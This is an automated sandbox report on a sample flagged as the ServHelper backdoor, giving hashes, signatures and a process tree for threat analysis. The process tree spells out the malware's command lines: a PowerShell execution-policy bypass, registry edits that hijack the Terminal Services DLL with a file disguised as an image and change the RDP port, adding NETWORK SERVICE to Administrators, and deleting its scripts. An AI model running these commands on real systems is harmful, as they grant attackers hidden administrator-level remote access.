Analysis
- max time kernel: 95s
- max time network: 120s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 10/10/2021, 11:58
Static task: static1
Behavioral task: behavioral1
- Sample: cb3cc551561883ab8fc4fb6fc837a469.exe
- Resource: win7-en-20210920
Behavioral task: behavioral2
- Sample: cb3cc551561883ab8fc4fb6fc837a469.exe
- Resource: win10-en-20210920
General
- Target: cb3cc551561883ab8fc4fb6fc837a469.exe
- Size: 4.0MB
- MD5: cb3cc551561883ab8fc4fb6fc837a469
- SHA1: f74ae6d243342099d3fa500cbc630f4a244a8d82
- SHA256: ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
- SHA512: b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1
Malware Config
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- Drops file in System32 directory (1 IoC)
  description | ioc | Process
  File created | C:\Windows\SysWOW64\rdpclip.exe | powershell.exe
- Drops file in Windows directory (8 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
- Modifies registry key (1 TTP, 1 IoC)
  pid | Process
  3632 | reg.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  pid | Process
  1572 | powershell.exe
  1572 | powershell.exe
  1572 | powershell.exe
  3424 | powershell.exe
  3424 | powershell.exe
  3424 | powershell.exe
  1600 | powershell.exe
  1600 | powershell.exe
  1600 | powershell.exe
  4052 | powershell.exe
  4052 | powershell.exe
  4052 | powershell.exe
  1572 | powershell.exe
  1572 | powershell.exe
  1572 | powershell.exe
- Suspicious behavior: LoadsDriver (1 IoC)
  pid | Process
  640 | Process not Found
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1572 | powershell.exe
  Token: SeDebugPrivilege | 3424 | powershell.exe
  Token: SeDebugPrivilege | 1600 | powershell.exe
  Token: SeDebugPrivilege | 4052 | powershell.exe
- Suspicious use of WriteProcessMemory (63 IoCs)
Processes (indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"
  PID: 2524
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    PID: 1572
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v3nplro\5v3nplro.cmdline"
      PID: 1072
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5v3nplro\CSCB864D1E737C475DBB2095527C87833.TMP"
        PID: 1144

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 3424
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 1600
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      PID: 4052
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      PID: 1548

    C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      PID: 3632
      - Modifies registry key

    C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      PID: 3200

    C:\Windows\SysWOW64\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      PID: 408
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 2488

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      PID: 3312
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c net start rdpdr
        PID: 2344
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net.exe
          Command line: net start rdpdr
          PID: 1756
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
            PID: 2328

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      PID: 1744
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c net start TermService
        PID: 2000
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\net.exe
          Command line: net start TermService
          PID: 4020
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
            PID: 1936

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      PID: 1840

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      PID: 2380